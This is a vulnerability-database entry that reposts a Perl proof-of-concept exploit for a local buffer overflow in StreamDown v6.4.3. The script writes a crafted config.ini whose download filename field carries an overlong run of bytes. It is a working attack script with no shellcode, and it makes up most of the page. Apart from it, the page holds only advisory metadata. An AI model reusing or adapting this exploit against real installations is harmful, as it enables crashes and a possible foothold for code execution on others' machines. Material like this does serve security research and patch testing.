StreamDown v6.4.3 Local Buffer Overflow PoC

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052217 漏洞类型
发布时间 2009-02-05 更新时间 2009-02-05
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009020010
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
 #!perl
#
# StreamDown v6.4.3 Local Buffer Overflow Exploit (0day)
# -------------------------------------------------------
# Research & Exploit  [Todor Donev :: todor.donev_at_gmail.com]
# -------------------------------------------------------
# Shareware software for downloading and stream ripping
#
# Tested on Windows XP SP3
# Proof Of Concept
# 
# Best regards and be safe,
# Todor Donev
#

$overflow = "\x41" x 256;
$x = "\x05\x01";
open(my $config, "> config.ini");
print $config "[SnifferPos]\n".
              "X=300\n".
              "Y=5\n".
              "state=0\n".
              "[TimeOut]\n".
              "Default=30\n".
              "[Proxy]\n".
              "server=\n".
              "port=\n".
              "enable=0\n".
              "[DestPath]\n".
              "Default=c:MyDownloads\n".
              "[Down]\n".
              "Count=1\n".
              "[0]\n".
              "URL=\n".
              "DestFileName=c:MyDownloadshttp".
               $overflow.$x."\n".
              "State=5\n".
              "TotalSize=0\n";
close $config;